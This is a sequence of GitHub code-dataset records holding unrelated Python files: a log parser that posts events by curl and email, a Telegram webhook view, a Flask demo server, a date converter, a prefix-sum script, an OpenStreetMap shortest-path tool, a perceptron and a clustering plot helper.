self.__logger.info(LOG_MAX_TEXT_LEN * '-')\n self.__logger.info('Events:')\n self.__logger.info(intend + '{:12}{}'.format('status:', combi_list_normalized_filtered.status_tuples))\n self.__logger.info(LOG_MAX_TEXT_LEN * '-')\n self.__logger.info('Compose a list of events each in form of a dictionary.')\n\n self.__logger.debug(LOG_MAX_TEXT_LEN * '-')\n self.__logger.debug('Calculate result tuples (T) and create result dictionaries (D).')\n i = 0\n for combi_item in combi_list_normalized_filtered.list:\n i += 1\n # calculate result tuples for replacing placeholders in the final result dictionary\n result_tuples = self.result_tuples(combi_item)\n self.__logger.debug('{}{}: {}'.format('T', i, result_tuples))\n # replace placeholders in the result dictionary by tuple values\n result_dict = self.fill_placeholders(self.__parser_result_fields, result_tuples)\n self.__logger.debug('{}{}: {}'.format('D', i, result_dict))\n # accumulate list of result dictionaries\n result_list.append(result_dict)\n\n return result_list\n\n def out_key_tuples(self, data, chunk_key):\n \"\"\"\n This function provides a list of unique tuples for the http chunk sending.\n Each tuple represents a key for collecting events to be sent in one chunk.\n :return: List of unique tuples for the http chunk sending\n\n Example:\n [('customerId','azse_datasynch'), ('customerId','hei_datasynch'), ('customerId','azse_datasynch')]\n \"\"\"\n t_list = []\n for d in data:\n for (k, v) in d.items():\n if k == chunk_key:\n t_list.append((k, v))\n # create a set of tuples in order to obtain unique items\n t_set = set(t_list)\n # return the set as a list of tuples\n return list(t_set)\n\n def curl_token(self, con):\n \"\"\"\n This function gets an authentication token from the ssd,\n after posting username and password.\n :param con: connection from connections file.\n :return: authentication token\n \"\"\"\n protocol = con['protocol']\n port = con['port']\n host = con['hostName']\n path = con['tokenPath']\n user = con['userName']\n pw = con['passWord']\n\n content_type = \"content-type: application/x-www-form-urlencoded\"\n url = protocol + \"://\" + host + \":\" + port + path\n data = \"client_id=pushClient&grant_type=password&scope=sportal&username=\" + user + \"&password=\" + pw\n\n self.__logger.debug(LOG_MAX_TEXT_LEN * '-')\n self.__logger.debug('Get auth token from url: ' + url)\n result = ''\n with Popen([\"curl\", \"-XPOST\", \"-H\", content_type, url, \"-d\", data],\n stdout=PIPE, bufsize=1, universal_newlines=True) as p:\n for line in p.stdout:\n result = result + line\n return result\n\n def curl_result(self, data, con):\n \"\"\"\n This function posts the data into the target url via curl.\n The data is sent in chunks that are built on the basis of the same customerId.\n Because the target url does contain the customerId in its path.\n Every single json event is sent separately\n :param data: Data to be sent to the target url.\n :param con: connection from connections file.\n :return: True - success, False - failed.\n \"\"\"\n intend = LOG_INTEND * ' '\n\n try:\n protocol = con['protocol']\n port = con['port']\n host = con['hostName']\n path = con['eventPath']\n except AttributeError:\n return False\n\n json_token = json.loads(self.curl_token(con)) # contains multiple token parameters\n access_token = json_token['access_token'] # extract the access token string exclusively\n authorization = \"authorization: Bearer \" + access_token\n content_type = \"content-type: application/json\"\n\n self.__logger.info(LOG_MAX_TEXT_LEN * '-')\n self.__logger.info('Send ' + str(len(data)) + ' events via cURL to SSD.')\n result = ''\n for (k, v) in self.out_key_tuples(data, self.__parser_http_out_chunk_key):\n # calculate chunk of result list due to chunkKey\n c_list = [d for d in data if d[k] == v]\n url = protocol + \"://\" + host + \":\" + port + path.replace(PH_CUSTOMER_ID, v)\n self.__logger.debug(LOG_MAX_TEXT_LEN * '-')\n self.__logger.debug(intend + 'Send ' + str(len(c_list)) + ' events for ' + v + '.')\n self.__logger.debug(intend + 'URL: ' + url)\n # send every single json event separately\n for c_event in c_list:\n with Popen([\"curl\", \"-XPOST\", \"-H\", authorization, \"-H\", content_type, url, \"-d\", json.dumps(c_event)],\n stdout=PIPE, bufsize=1, universal_newlines=True) as p:\n for line in p.stdout:\n result += line\n result += '\n'\n return True\n\n def mail_result(self, data, con):\n \"\"\"\n This function sends the data to a mailbox.\n The data is sent in chunks that are built on the basis of the same chunkKey (here customerId).\n Because the target mailbox expects the chunkKey enclosed in square brackets in the mail subject.\n All json events of one chunkKey are sent in one e-mail.\n :param data: Data to be sent to the target url.\n :param con: connection from connections file.\n :return: True - success, False - failed.\n \"\"\"\n intend = LOG_INTEND * ' '\n\n try:\n protocol = con['protocol']\n host = con['hostName']\n addr_to = con['to']\n addr_from = con['from']\n subject_ph = con['subject'] # get subject with placeholder\n body_delim = con['bodyDelimiter']\n except AttributeError:\n return False\n\n self.__logger.info(LOG_MAX_TEXT_LEN * '-')\n self.__logger.info('Send ' + str(len(data)) + ' events via ' + protocol + ' e-mail to SSD.')\n body = ''\n for (k, v) in self.out_key_tuples(data, self.__parser_mail_out_chunk_key):\n # calculate chunk of result list due to chunkKey\n c_list = [d for d in data if d[k] == v]\n self.__logger.debug(LOG_MAX_TEXT_LEN * '-')\n self.__logger.debug(intend + 'Send ' + str(len(c_list)) + ' events for ' + v + '.')\n self.__logger.debug(intend + 'From: ' + addr_from)\n self.__logger.debug(intend + 'To: ' + addr_to)\n # calculate mail subject and body\n subject = subject_ph.replace(PH_CHUNK_KEY, v)\n body = body_delim + '\n' + json.dumps(c_list) + '\n' + body_delim\n\n # compose mail\n msg = MIMEText(body)\n msg['Subject'] = subject\n msg['From'] = addr_from\n msg['To'] = addr_to\n \n try:\n # Send the message via SMTP server.\n s = smtplib.SMTP(host)\n s.send_message(msg)\n s.quit()\n except Exception as e:\n self.__logger.error('Failed sending events for ' + v + ' via e-mail to SSD, message: ' + str(e)) \n\n return True\n\n def log_info(self):\n \"\"\"\n This function logs basic information about the log parser.\n :return: log entries about log file and parser\n \"\"\"\n intend = LOG_INTEND * ' '\n self.__logger.info(LOG_MAX_TEXT_LEN * '-')\n self.__logger.info('Log:')\n self.__logger.info(intend + '{:12}{}'.format('id:', self.__log_id))\n self.__logger.info(intend + '{:12}{}'.format('name:', self.__log_name))\n self.__logger.info(intend + '{:12}{}'.format('fileName:', self.__log_filename))\n self.__logger.info('Parser:')\n self.__logger.info(intend + '{:12}{}'.format('id:', self.__parser_id))\n self.__logger.info(intend + '{:12}{}'.format('info:', self.__parser_text))\n if self.__parser_regex_positive:\n status = '\"ok\"'\n else:\n status = '\"error\"'\n self.__logger.info(intend + '{:12}{}'.format('search:', 'Found lines are interpreted as ' + status + '.'))\n 
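`curl_token` and `curl_result` above shell out to cURL via `Popen`. The same OAuth password-grant POST can be done in-process; a hedged sketch using the `requests` library (connection fields mirror the dict used above; this is not the project's actual code):

```python
import requests

def fetch_token(con: dict) -> str:
    url = f"{con['protocol']}://{con['hostName']}:{con['port']}{con['tokenPath']}"
    data = {
        'client_id': 'pushClient',
        'grant_type': 'password',
        'scope': 'sportal',
        'username': con['userName'],
        'password': con['passWord'],
    }
    resp = requests.post(url, data=data)  # form-encoded, like the cURL -d string
    resp.raise_for_status()
    return resp.json()['access_token']
```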
self.__logger.info(LOG_MAX_TEXT_LEN * '-')\n # debug info\n self.__logger.debug('Log dictionary:')\n for line in pprint.pformat(self.__dict_log).split('\\n'):\n self.__logger.debug(intend + '{}'.format(line))\n self.__logger.debug('')\n self.__logger.debug('Parser dictionary:')\n for line in pprint.pformat(self.__dict_parser).split('\\n'):\n self.__logger.debug(intend + '{}'.format(line))\n self.__logger.debug(LOG_MAX_TEXT_LEN * '-')\n self.__logger.debug('')\n\n pass\n\n def dump(self):\n print('\\tlog_name: {}'.format(self.__log_name))\n print('\\tlog_type: {}'.format(self.__log_type))\n print('\\tlog_pathname: {}'.format(self.__log_pathname))\n print('\\tlog_filename: {}'.format(self.__log_filename))\n print('\\tlog_date_exists: {}'.format(self.log_date_exists))\n print('\\tlog_date_format: {}'.format(self.__log_date_format))\n print('\\tlog_date_regex: {}'.format(self.__log_date_regex))\n print('\\tparser_id: {}'.format(self.__parser_id))\n print('\\tparser_regex: {}'.format(self.__parser_regex))\n print('\\tparser_key_level: {}'.format(self.__parser_key_level))\n print('\\tparser_search_col: {}'.format(self.__parser_search_col))\n print('\\tparser_chunk_size: {}'.format(self.__parser_chunk_size))\n print('\\tparser_chunk_offset: {}'.format(self.__parser_chunk_offset))\n print('\\tparser_chunk_number: {}'.format(self.__parser_chunk_number))\n print('\\tparser_chunk_counter: {}'.format(self.__parser_chunk_index))\n print('\\tparser_time_offset: {}'.format(self.__parser_time_offset))\n print('\\tparser_time_interval: {}'.format(self.__parser_time_interval))\n print('\\tparser_dt_start: {}'.format(self.__parser_dt_start))\n print('\\tparser_dt_end: {}'.format(self.__parser_dt_end))\n print('\\tparser_group_slice: {}\\n'.format(self.__parser_group_slice))\n","repo_name":"uc007/logparser","sub_path":"lib/lopa.py","file_name":"lopa.py","file_ext":"py","file_size_in_byte":54680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74565122754","text":"import json\nimport hashlib\n\nimport httpx\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom .models import WebhookResponse, RegisteredBot\n\n\ndef redirect_from_index(request):\n return redirect('show_request_data')\n\n\n@csrf_exempt\ndef show_request_data(request):\n if request.method == 'POST':\n request_data = json.loads(request.body)\n elif request.method == 'GET':\n request_data = dict(request.GET.items())\n if request_data:\n new_entry = WebhookResponse.objects.create(response_content=request_data)\n headers = dict(request.headers)\n if headers.get('X-Telegram-Bot-Api-Secret-Token'):\n hashed_token = hashlib.sha256(\n headers.get('X-Telegram-Bot-Api-Secret-Token').encode()\n )\n bot = get_object_or_404(RegisteredBot, secret_token_hash=hashed_token.hexdigest())\n chat_id = request_data['message']['chat'].get('id')\n message_text = request_data['message'].get('text')\n \n sent_message = httpx.get(\n f'https://api.telegram.org/bot{bot.API_token}/sendMessage', \n params={'chat_id': chat_id, 'text': f'Вы написали: {message_text}'}\n )\n return JsonResponse(request_data)\n \n","repo_name":"SergIvo/tg-webhook-test","sub_path":"connector/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30203932159","text":"# server.py\n\n\nfrom flask import 
Flask, request, jsonify\n\n\napp = Flask(__name__)\n\n\n# give decorator to app to access route\n@app.route(\"/\", methods=[\"GET\"])\ndef server_status():\n    return \"Server is on.\"\n    # I would visit http://127.0.0.1:5000/ to access this route\n\n\n@app.route(\"/info\", methods=[\"GET\"])\ndef information():\n    x = \"This website will calculate blood cholesterol levels\\n\"\n    x += \"It is written by Seijung Kim\"\n    return x\n\n\n@app.route(\"/hdl_check\", methods=[\"POST\"])\ndef hdl_check_from_internet():\n    # usually, the info sent is stored in a dictionary\n    '''\n    incoming_json = {\"name\": <name>,\n                     \"hdl_value\": <value>}\n    '''\n    from blood_calculator import check_HDL\n    in_data = request.get_json()\n    hdl_value = in_data[\"hdl_value\"]\n    print(\"The received value was {}\".format(hdl_value))\n    answer = check_HDL(hdl_value)\n    return answer\n\n\n@app.route(\"/add_numbers\", methods=[\"POST\"])\ndef add_numbers_to_internet():\n    '''\n    {\"a\": 5, \"b\": 12}\n    return sum of these numbers\n    '''\n    in_data = request.get_json()\n    value_a = in_data[\"a\"]\n    value_b = in_data[\"b\"]\n    sum = value_a + value_b\n    # answer = \"The sum of {} and {} is {}\".format(value_a, value_b, str(sum))\n    answer = sum\n    return jsonify(answer)\n\n\n@app.route(\"/add/<a>/<b>\", methods=[\"GET\"])\ndef add_variable_url(a, b):  # <a> for a, <b> for b\n    answer = int(a) + int(b)\n    return jsonify(answer)\n\n\nif __name__ == \"__main__\":\n    app.run()\n","repo_name":"seij001/BME547_Fall2022","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37309970657","text":"month = [\n    \"January\",\n    \"February\",\n    \"March\",\n    \"April\",\n    \"May\",\n    \"June\",\n    \"July\",\n    \"August\",\n    \"September\",\n    \"October\",\n    \"November\",\n    \"December\"\n]\nday = [\"01\",\"02\",\"03\",\"04\",\"05\",\"06\",\"07\",\"08\",\"09\",\"10\",\n       \"11\",\"12\",\"13\",\"14\",\"15\",\"16\",\"17\",\"18\",\"19\",\"20\",\n       \"21\",\"22\",\"23\",\"24\",\"25\",\"26\",\"27\",\"28\",\"29\",\"30\",\"31\"]\n\nmonthInNumeric = [\"01\", \"02\", \"03\", \"04\",\n                  \"05\", \"06\", \"07\", \"08\", \n                  \"09\", \"10\", \"11\", \"12\"]\ndate = input()\nif date.find(\"/\") != -1:\n    date = date.split(\"/\") \n    try:\n        finaldate = date[2] + \"-\" + monthInNumeric[int(date[0])-1] + \"-\" + day[int(date[1])-1]\n        print(finaldate)\n    except(NameError,ValueError,IndexError):\n        print(\"something error\")\nelse:\n    date = date.replace(\",\" , \"\")\n    date = date.split(\" \")\n    try:\n        finaldate = date[2] + \"-\" + monthInNumeric[month.index(date[0])]+ \"-\" + day[int(date[1])-1]\n        print(finaldate)\n\n    except (NameError, ValueError, IndexError):\n        print(\"something error\")\n        \n","repo_name":"TamariPopkhadze/Task21","sub_path":"outdated.py","file_name":"outdated.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"99507446","text":"def preprocess(mat, _n,_m):\n    s = [[0 for j in range(_m)] for i in range(_n)] # new matrix\n    # the first element of the new matrix equals the first element of the original one\n    s[0][0] = mat[0][0]\n    for i in range(1, _m): # fill the first row with values\n        s[0][i] = mat[0][i]+s[0][i-1]\n    for i in range(1, _n): # fill the first column with values\n        s[i][0] = mat[i][0]+s[i-1][0]\n    for i in range(1, _n): # fill the rest of the matrix\n        for j in range(1, _m):\n            s[i][j] = mat[i][j]+s[i-1][j]+s[i][j-1]-s[i-1][j-1]\n    return s\n\n\nmatrix = []\nn, m, k 
= map(int, input().split())\nfor i in range(n):\n    matrix.append(list(map(int, input().split())))\n# now we have the new matrix with the required values\nmatrix = preprocess(matrix, n, m)\nfor i in range(k):\n    a, b, c, d = map(int, input().split())\n    # total equals mat[c][d] - mat[c][b-1] - mat[a-1][d] + mat[a-1][b-1]; since the coordinates are given as absolute (1-based) values, we also subtract one everywhere\n    total = matrix[c-1][d-1]\n    # boundary checks\n    if b - 2 >= 0:\n        total -= matrix[c-1][b-2]\n    if a - 2 >= 0:\n        total -= matrix[a-2][d-1]\n    if a-2 >= 0 and b-2 >= 0:\n        total += matrix[a-2][b-2]\n    print(total)\n","repo_name":"virdgin/Lean-and-Traning","sub_path":"yandex.algorithm_3/9_sum_mat.py","file_name":"9_sum_mat.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42037365895","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 15 01:54:45 2021\n\n@author: duma\n\"\"\"\nimport collections\nimport heapq\nimport sys\nfrom matplotlib import pyplot\nfrom math import radians, cos, sin, asin, sqrt\nimport networkx as nx\nimport numpy as np\nimport pandas as pd\nimport regex as re\nimport matplotlib.pyplot as plt\nfrom datetime import datetime\n\ngraph = {}\nvertices_no = 0\n\ndef haversine_distance(lon1, lat1, lon2, lat2, unit_m=True):\n    \"\"\"\n    Calculate the great circle distance between two points\n    on the earth (specified in decimal degrees)\n    default unit : km\n    \"\"\"\n    # convert decimal degrees to radians\n    lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n    # haversine formula\n    dlon = lon2 - lon1\n    dlat = lat2 - lat1\n    a = sin(dlat / 2)**2 + cos(lat1) * cos(lat2) * sin(dlon / 2)**2\n    c = 2 * asin(sqrt(a))\n    r = 6371 # Radius of the Earth in kilometers. 
Use 3956 for miles\n    if unit_m:\n        r *= 1000\n    return c * r\n\ndef add_vertex(v):\n    global graph\n    global vertices_no\n    if v in graph:\n        pass\n    else:\n        vertices_no = vertices_no + 1\n        graph[v] = []\n\n# Add an edge between vertex v1 and v2 with edge weight e\ndef add_edge(v1, v2, e):\n    global graph\n    # Check if vertex v1 is a valid vertex\n    if v1 not in graph:\n        pass\n    # Check if vertex v2 is a valid vertex\n    elif v2 not in graph:\n        pass\n    else:\n        # Since this code is not restricted to a directed or \n        # an undirected graph, an edge between v1 v2 does not\n        # imply that an edge exists between v2 and v1\n        temp = [v2, e]\n        graph[v1].append(temp)\n\n\n# Print the graph\n \ndef write_edges_file(file_name):\n    global graph\n    with open(file_name, 'w') as f:\n        for vertex in graph:\n            for edges in graph[vertex]:\n                line = vertex+' '+str(edges[0])+' '+str(edges[1])+'\\n'\n                f.write(line)\n    f.close()\n    \ndef shortestPath(edges, source, sink):\n    # create a weighted DAG - {node:[(cost,neighbour), ...]}\n    graph = collections.defaultdict(list)\n    for l, r, c in edges:\n        graph[l].append((c,r))\n    # create a priority queue and hash set to store visited nodes\n    queue, visited = [(0, source, [])], set()\n    heapq.heapify(queue)\n    # traverse graph with BFS\n    while queue:\n        (cost, node, path) = heapq.heappop(queue)\n        # visit the node if it was not visited before\n        if node not in visited:\n            visited.add(node)\n            path = path + [node]\n            # hit the sink\n            if node == sink:\n                return (cost, path)\n            # visit neighbours\n            for c, neighbour in graph[node]:\n                if neighbour not in visited:\n                    heapq.heappush(queue, (cost+c, neighbour, path))\n    return float(\"inf\")\n\n\n\nif __name__ == '__main__':\n\n    if(len(sys.argv)<3):\n        print(\"Correct usage is: python3 shortest_path_graph.py source target\")\n        sys.exit()\n\n\n    file = open('bilecik_modified.osm')\n    lines = file.readlines()\n\n    nodes = {}\n    way = []\n    ways = {}\n    checkpoints = []\n\n    way_flag = 0 ## to understand \n    save_flag = 0 ## to save\n\n    for line in lines: ## iterate over the osm file \n\n        if (way_flag == 1):\n\n            if(line.find(\"k=\\'highway\\'\") != -1): ## if highway\n                if(line.find(\"v=\\'footway\\'\") == -1): ## if not footway\n                    save_flag = 1 ## save it when find /way\n                    continue\n                continue\n            \n            elif(line.find(\"</way>\")) != -1:\n\n                way_flag = 0\n                if(save_flag == 1): ## if we found way closing tag and its highway not footway save\n                    ways[way[0]] = way[1:]\n                    save_flag = 0\n                way = []\n\n            elif(line.find(\"1:\n            checkpoints.append(key)\n    for key, value in ways.items():\n        if len(value) > 0:\n            checkpoints.append(value[0])\n            checkpoints.append(value[-1])\n    myset = set(checkpoints)\n    checkpoints = list(myset)\n    checkpoints.sort()\n    with open('checkpoints.txt', 'w') as f:\n        for c in checkpoints:\n            f.write(c+'\\n')\n    f.close()\n\n    \n    ## Creating new vertices and edges based on checkpoints\n    for key, value in ways.items():\n        distance = 0\n        length = len(value)\n        \n        if length < 2: ## means there is a problem with ways list\n            continue\n        \n        start_node = value[0]\n        \n        if length == 2:\n            lat1 = float(nodes[value[0]][0])\n            lon1 = float(nodes[value[0]][1])\n            lat2 = float(nodes[value[1]][0])\n            lon2 = float(nodes[value[1]][1])\n            distance = haversine_distance(lon1,lat1,lon2,lat2)\n            add_vertex(start_node)\n            add_vertex(value[1])\n            add_edge(start_node,value[1],distance)\n            continue\n\n        for i in range(1,length): ## sum distance between x and x+1, iterate over the list to the end or a checkpoint\n\n            lat1 = float(nodes[value[i-1]][0])\n            lon1 = float(nodes[value[i-1]][1])\n            lat2 = float(nodes[value[i]][0])\n            lon2 
= float(nodes[value[i]][1])\n            distance += haversine_distance(lon1,lat1,lon2,lat2)\n            \n            if value[i] in checkpoints:\n                add_vertex(start_node)\n                add_vertex(value[i])\n                add_edge(start_node,value[i],distance)\n                distance = 0\n                start_node = value[i]\n                continue\n            elif value[i] == value[-1]:\n                add_vertex(start_node)\n                add_vertex(value[i])\n                add_edge(start_node,value[i],distance)\n                continue\n    \n    write_edges_file('edges.txt')\n\n    edges = []\n    file = open('edges.txt')\n    lines = file.readlines()\n    for line in lines:\n        line = line.strip()\n        line = line.split(' ')\n        source = str(line[0])\n        target = str(line[1])\n        weight = int(float(line[2]))\n        temp_list = []\n        temp_list.append(source)\n        temp_list.append(target)\n        temp_list.append(weight)\n        edges.append(temp_list)\n    file.close()\n\n    source = '2024879246'\n    target = '8982649767'\n\n    output = shortestPath(edges, sys.argv[1], sys.argv[2])\n    if(output == float(\"inf\")):\n        print(\"Unfortunately there is no new path, you need to wait until the way is opened.\")\n        sys.exit()\n    G=nx.Graph()\n\n    file = open('edges.txt')\n    lines = file.readlines()\n    for line in lines:\n        line = line.split(' ')\n\n        lat1 = nodes[line[0]][0]\n        lon1 = nodes[line[0]][1]\n        lat2 = nodes[line[1]][0]\n        lon2 = nodes[line[1]][1]\n        \n        G.add_node(line[0],pos=(lat1,lon1))\n        G.add_node(line[1],pos=(lat2,lon2))\n        if line[0] not in output[1]:\n            G.add_edge(line[0],line[1],color='b',weight=1)\n        else:\n            pass\n        \n    file.close()\n\n\n    for i in range(len(output[1])-1):\n        G.add_edge(output[1][i],output[1][i+1],color='r',weight=20)\n\n    colors = nx.get_edge_attributes(G,'color').values()\n    weights = nx.get_edge_attributes(G,'weight').values()\n\n    my_pos = nx.spring_layout(G, seed = 2) ## seed to keep graph same.\n    plt.figure(figsize=(25,25))\n    nx.draw(G,my_pos,width=list(weights),edge_color=colors)\n\n    now = datetime.now()\n    dt_string = now.strftime(\"%d/%m/%Y %H:%M:%S\")\n    dt_string = dt_string.replace(' ','-')\n    dt_string = dt_string.replace('/','-')\n    dt_string = dt_string.replace(':','-')\n    print(dt_string)\n    plt.savefig(dt_string+'.png')\n","repo_name":"tahayusufkomur/urban_routing_project","sub_path":"problem e/shortest_path_graph.py","file_name":"shortest_path_graph.py","file_ext":"py","file_size_in_byte":8766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73845913793","text":"import sys\n\n\ndef findTorque(a, b, c):\n    R = -b / (2 * a)\n    return a * R ** 2 + b * R + c\n\n\nif __name__ == \"__main__\":\n    inputs = sys.stdin.readlines()\n    outputs = []\n\n    # Read inputs\n    tc = int(inputs[0])\n    i = 1\n    for _ in range(tc):\n        n = int(inputs[i])\n        i += 1\n\n        gears = [tuple(map(int, row.split())) for row in inputs[i : i + n]]\n        i += n\n\n        maxTorque = ans = 0\n        for id, (a, b, c) in enumerate(gears, start=1):\n            torque = findTorque(-a, b, c)\n            if torque > maxTorque:\n                maxTorque = torque\n                ans = id\n        print(ans)\n","repo_name":"jetkan-yk/phyting","sub_path":"cp4/cs/growlinggears.py","file_name":"growlinggears.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"39987435324","text":"from typing import Optional, List\n\nfrom fastapi import APIRouter, Depends, Response\nfrom pydantic import BaseModel, Field\nfrom src.db.dals.book_dal import BookDAL\nfrom src.db.models.book import Book\nfrom src.requests.books.BookRequest import BookRequest\nfrom src.controllers.api.BookController import BookController\nfrom dependencies import get_book_dal\n\nrouter = APIRouter(\n    
prefix='/books',\n    tags=['books']\n)\n\n\nclass Todo(BaseModel):\n    title: str\n    description: Optional[str]\n    priority: int = Field(gt=0, lt=6, description='Priority must be between 1 and 5')\n    complete: bool\n\n\n@router.post(\"/\")\n# async def create_book(name: str, author: str, release_year: int, book_dal: BookDAL = Depends(get_book_dal)):\n#     return await book_dal.create_book(name, author, release_year)\nasync def create_book(request: BookRequest,\n                      book_controller: BookController = Depends(BookController)):\n    return await book_controller.create_books(request)\n    # return request\n\n\n@router.put(\"/{book_id}\")\nasync def update_book(book_id: int,\n                      name: Optional[str] = None,\n                      author: Optional[str] = None,\n                      release_year: Optional[int] = None,\n                      book_dal: BookDAL = Depends(get_book_dal)):\n    return await book_dal.update_book(book_id, name, author, release_year)\n\n\n# @router.get(\"/books\")\n# async def get_all_books(book_dal: BookDAL = Depends(get_book_dal)) -> List[Book]:\n#     return await book_dal.get_all_books()\n","repo_name":"NileshSaha/python_async","sub_path":"src/routers/books/book_router.py","file_name":"book_router.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27985464948","text":"# coding: utf8\n# !/usr/bin/env python\n# ------------------------------------------------------------------------\n# Perceptron in pytorch (using just the tensors)\n# Written by Mathieu Lefort\n#\n# Distributed under the BSD licence.\n# ------------------------------------------------------------------------\n\n# Submission by Khaled ABDRABO (p1713323) and Jean BRIGNONE (p1709655)\n\nimport gzip, numpy, torch\n\nif __name__ == '__main__':\n    # Hyperparameters\n    #\n    # eta : controls the rate of change of the weights.\n    # The larger its value, the faster the algorithm converges, with less precise results.\n    # Conversely, the smaller its value, the slower the algorithm\n    # converges, but the closer it gets to good results.\n    # If the value is far too large, the model learns too fast and therefore ends up learning nothing.\n    #\n    # w_min and w_max : the initial weights. 
The closer they get to 0, the faster the algorithm converges.\n\n    batch_size = 5 # number of data samples read at a time\n    nb_epochs = 10 # number of times the database will be read\n    eta = 0.001 # learning rate 0.001\n    w_min = -0.001 # minimum weight\n    w_max = 0.001 # maximum weight\n    nb_neurones_cc = 784 # number of neurons in the hidden layer\n    #f = open(\"res.txt\", \"a\")\n\n    # read the data\n    ((data_train, label_train), (data_test, label_test)) = torch.load(gzip.open('mnist.pkl.gz'))\n\n    # initialise the model and its weights\n    # size of tensor w = 784 (data_train.shape[1]) * 784 (nb_neurones_cc); tensor wcc = 784 * 10 (label_train.shape[1])\n    w = torch.empty((data_train.shape[1], nb_neurones_cc), dtype=torch.float)\n    wcc = torch.empty((nb_neurones_cc, label_train.shape[1]), dtype=torch.float)\n\n    # size of tensor b = 1*10 = 10\n    b = torch.empty((1, label_train.shape[1]), dtype=torch.float)\n    bcc = torch.empty((1, nb_neurones_cc), dtype=torch.float)\n    torch.nn.init.uniform_(w, w_min, w_max)\n    torch.nn.init.uniform_(wcc, w_min, w_max)\n    torch.nn.init.uniform_(b, w_min, w_max)\n    torch.nn.init.uniform_(bcc, w_min, w_max)\n\n    nb_data_train = data_train.shape[0]\n    nb_data_test = data_test.shape[0]\n    # size of the indices tensor = 12600 (the 63000 / 5 [batch_size])\n    indices = numpy.arange(nb_data_train, step=batch_size)\n\n    for n in range(nb_epochs):\n        # shuffle the (indices of the) data\n        numpy.random.shuffle(indices)\n        # read all the training data\n        for i in indices:\n            # get the inputs\n            # size of tensor x = 5 * 784 = 3920\n            x = data_train[i:i + batch_size]\n            # compute the output of the hidden layer\n            ycc = 1 / (1 + torch.exp(- (torch.mm(x, w) + bcc)))\n            # compute the output of the model\n            # size of tensor y = 5 * 10 = 50\n            y = torch.mm(ycc, wcc) + b \n            # look at the true labels\n            # size of tensor t = 5 * 10 = 50\n            t = label_train[i:i + batch_size]\n            # update the weights\n            # size of the gradient tensor = 5 * 10 = 50\n            grad = (t - y)\n            gradcc = ycc * (1 - ycc) * torch.mm(grad, wcc.T)\n\n            wcc += eta * torch.mm(ycc.T, grad)\n            w += eta * torch.mm(x.T, gradcc)\n\n            bcc += eta * gradcc.sum(axis=0)\n            b += eta * grad.sum(axis=0)\n\n        # test the model (we evaluate progress during training)\n        # counter of correct answers\n        acc = 0.\n        # read all the test data\n        for i in range(nb_data_test):\n            # get the input\n            # size of tensor x = 1 * 784 = 784\n            x = data_test[i:i + 1]\n            # compute the output of the model\n            # size of tensor y = 1 * 10 = 10\n            ycc = 1 / (1 + torch.exp(- (torch.mm(x, w) + bcc)))\n            y = torch.mm(ycc, wcc) + b \n            # look at the true label\n            # size of tensor t = 1 * 10 = 10\n            t = label_test[i:i + 1]\n            # check whether the output is correct\n            acc += torch.argmax(y, 1) == torch.argmax(t, 1)\n        # print the percentage of correct answers\n        print(acc / nb_data_test * 100)\n        #f.write(str(acc / nb_data_test * 100))\n    #f.close()","repo_name":"khaledabdrabo98/basic-perceptrons","sub_path":"perceptron_pytorch.py","file_name":"perceptron_pytorch.py","file_ext":"py","file_size_in_byte":4340,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72574764355","text":"import matplotlib.pyplot as plt\nfrom settings import *\nimport random\n\n\ndef plot_cluster(result, trainingData, numOfClass):\n    plt.figure(2)\n    # create numOfClass empty lists\n    lab = [[] for i in range(numOfClass)]\n    index = 0\n    for lab_i in result:\n        lab[lab_i].append(index)\n        index += 
1\n    color = ['oy', 'ob', 'og', 'cs', 'ms', 'bs', 'ks', 'ys', 'yv', 'mv', 'bv', 'kv', 'gv', 'y^', 'm^', 'b^', 'k^',\n             'g^'] * 3\n    for i in range(numOfClass):\n        x1 = []\n        y1 = []\n        for data in trainingData[lab[i]]:\n            try:\n                x1.append(data[0])\n                y1.append(data[1])\n            except Exception as e:\n                print(e)\n        plt.plot(x1, y1, color[i])\n    plt.show()\n\n\ndef plot_result(data, cluster_res, cluster_num, algorithm='None'):\n    nPoints = len(data)\n    scatter_colors = ['blue', 'green', 'yellow', 'red', 'purple', 'orange', 'brown']\n    for i in range(cluster_num):\n        color = scatter_colors[i % len(scatter_colors)]\n        x1 = []\n        y1 = []\n        for j in range(nPoints):\n            if cluster_res[j] == i:\n                x1.append(data[j, 0])\n                y1.append(data[j, 1])\n        plt.scatter(x1, y1, c=color, alpha=1, marker='o')\n        plt.plot(markersize=10)\n    plt.savefig(PLOT_DIR + algorithm + '-' + str(random.randint(10, 100)) + str(cluster_num) + '.png')\n    plt.show()\n\n\ndef plot_labels(labels: list, training_data):\n    unique_labels = set(labels)\n    colors = ['blue', 'green', 'yellow', 'red', 'purple', 'orange', 'brown']\n    for label, color in zip(unique_labels, colors):\n        if label == -1:\n            color = [0, 0, 0, 1]\n\n        class_member_mask = (labels == 